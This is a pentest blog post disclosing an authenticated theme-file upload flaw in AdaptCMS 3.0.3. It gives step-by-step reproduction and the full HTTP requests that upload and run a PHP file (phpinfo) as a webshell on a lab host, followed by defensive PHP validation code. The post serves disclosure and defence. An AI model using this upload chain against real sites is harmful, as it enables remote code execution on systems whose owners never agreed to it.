Sunday, 22 June 2025

Friday Fun Pentest Series - 26 - Authenticated File Upload to RCE - adaptcmsv3.0.3

Description

- It was noted that the application's theme file upload functionality was vulnerable to unrestricted file upload, resulting in RCE via a webshell upload


Authenticated File Upload to RCE #1:

Steps to Reproduce:

  1. Log in as the admin user and go to "System" > "Appearance" > "Themes" > "Default" > "Theme Files", then choose "Add New File"
  2. Select "Add File" and enter the following payload in "File Contents": "<?php phpinfo(); ?>"
  3. Set "File Extension" to "php" and "Folder Location" to "Images"
  4. Once uploaded, the file is served from the theme's "img" directory under the webroot

// HTTP POST request

POST /adaptcms/admin/themes/asset_add/Default HTTP/1.1
Host: 192.168.58.131
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.0
[...]


[...]
------geckoformboundary648cea5cd97a776abc03a12296adaf90
Content-Disposition: form-data; name="data[Asset][filename]"; filename=""
Content-Type: application/octet-stream

------geckoformboundary648cea5cd97a776abc03a12296adaf90
Content-Disposition: form-data; name="data[Asset][content]"

<?php phpinfo(); ?>
------geckoformboundary648cea5cd97a776abc03a12296adaf90
Content-Disposition: form-data; name="data[Asset][file_extension]"

php
------geckoformboundary648cea5cd97a776abc03a12296adaf90
Content-Disposition: form-data; name="data[Asset][file_name]"

test
------geckoformboundary648cea5cd97a776abc03a12296adaf90
Content-Disposition: form-data; name="data[Asset][folder]"

img/
------geckoformboundary648cea5cd97a776abc03a12296adaf90
Content-Disposition: form-data; name="data[Asset][theme]"
[...]


// HTTP Response

HTTP/1.1 302 Found
Date: Fri, 30 May 2025 16:06:57 GMT
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3
X-Powered-By: PHP/5.6.40
Location: http://192.168.58.131/adaptcms/admin/themes/edit/Default#assets
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


// HTTP Request triggering the webshell

GET /adaptcms/app/webroot/img/test.php HTTP/1.1
Host: 192.168.58.131
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.0
[...]


// HTTP Response triggering the webshell

HTTP/1.1 200 OK
Date: Fri, 30 May 2025 16:15:36 GMT
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3
X-Powered-By: PHP/5.6.40
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 102019

[...]
<h1 class="p">PHP Version 5.6.40</h1>
</td></tr>
</table>
<table>
<tr><td class="e">System </td><td class="v">Linux debian 6.1.0-32-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.129-1 (2025-03-06) x86_64 </td></tr>
<tr>
[...]
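As an added defensive example (not part of this write-up and not AdaptCMS's own code), the PHP check below shows the kind of server-side validation of the asset_add fields that would reject the request above: the folder is restricted to known theme directories, the extension to a per-folder allowlist, and the file name to a plain basename. The function name and allowlists are assumptions for illustration.

```php
<?php
// Added example, not AdaptCMS code. Parameters mirror the form fields
// data[Asset][file_name], data[Asset][file_extension] and data[Asset][folder].
// The folder/extension allowlists below are assumptions for illustration.

function validateThemeAsset(string $fileName, string $extension, string $folder): array
{
    // Each upload folder gets its own extension allowlist; anything else is refused.
    // The vulnerable flow accepted "php" for "img/" and wrote it under the webroot.
    $allowed = [
        'img/' => ['png', 'jpg', 'jpeg', 'gif'],
        'css/' => ['css'],
        'js/'  => ['js'],
    ];

    if (!array_key_exists($folder, $allowed)) {
        return ['ok' => false, 'error' => 'unknown folder'];
    }

    // Normalise case so "pHp" is treated the same as "php".
    $extension = strtolower($extension);
    if (!in_array($extension, $allowed[$folder], true)) {
        return ['ok' => false, 'error' => 'extension not permitted in this folder'];
    }

    // Reject traversal, nested paths and double extensions: the name must be a
    // bare basename drawn from a conservative character set (no dots or slashes).
    if ($fileName !== basename($fileName) || !preg_match('/^[A-Za-z0-9_-]{1,64}$/', $fileName)) {
        return ['ok' => false, 'error' => 'invalid file name'];
    }

    return ['ok' => true, 'path' => $folder . $fileName . '.' . $extension];
}

// The fields from the write-up's request: file_name=test, file_extension=php, folder=img/
var_dump(validateThemeAsset('test', 'php', 'img/'));
// A legitimate theme image, with mixed-case extension
var_dump(validateThemeAsset('logo', 'PNG', 'img/'));
// A traversal attempt in the file name
var_dump(validateThemeAsset('../shell', 'png', 'img/'));
```

The allowlist should be paired with a web-server rule that disables script execution for the theme asset directories, so that a bypass of the application check still does not yield code execution.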
